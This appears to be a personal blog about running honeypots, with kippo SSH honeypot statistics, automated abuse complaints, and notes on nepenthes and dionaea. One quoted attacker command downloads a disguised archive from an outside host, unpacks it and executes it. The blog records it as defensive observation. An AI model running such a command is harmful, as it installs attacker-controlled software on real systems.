spamversand

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂

After trying to build some nice graphs for the kippo-honeypot with PyCha I found

this little toolbox making things way better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats

The kippo honeypot is now running for about a week..

Up to now I have seen

* more than 1.3 Million Connects

* more than 7.100 successful logins

* > 2.200 commands typed

* more than 2.100 different Source IP addresses

* 178 Files uploaded, most of them psyBNC bouncers

Whow.. I expected *some* brute-force atempts, but that much?

The sshd – honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some are downloading files and try to do “things”:

-rw——- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw——- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw——- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..

Whow.. I finally crossed the 50.000 complaints line. I got about 18.600 replies to
my complaints; either being autoreplies by abuse departments, activity statements of the
providers or “over quota” or similar bounce messages from abuse-mailboxes.
I hope that this service does something good.

Since the beginning of sending automated complaints due to attacks of my honeypot the system now has send out more than 20.000 emails. Some positive reactions have reached me, so I hope that this service is somewhat helpful. Funny are the bounces from the not reachable abuse-addresses .. will put them on a different page soon.

The nepenthes-teammembers have been busy working on a new (low interaction) honeypot.
The name dionaea is taken from another carnivore. Here is the link to the project-homepage. Sounds interesting, since it is written in C with python-modules attached.

When dealing with submit modules of nepenthes, you will find several notices about the favourite one of the authors of nepenthes, namely submit-mwserv (with the appropriate submit-mwserv.conf – file).
However, there is no hint on how to write the necessary ‘submit’ application on the receiving server-side..
To see what data is actually sent, I set up a listening socket and wrote the incoming raw – data to a file.
They looked like:

POST /heartbeat HTTP/1.1
User-Agent: nepenthes 0.2.2 (Linux, x86, g++)
Host: www.spamversand.de:8989
Accept: */*
Content-Length: 487
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------285dc72e
916a

A normal http-post request. Not really normal though, because the Expect: “100-continue” header was new to me. A quick google-check found rfc2616 : 8.2.3 Use of the 100 (Continue) Status So I will answer the request with a “100” response and will see what data will follow..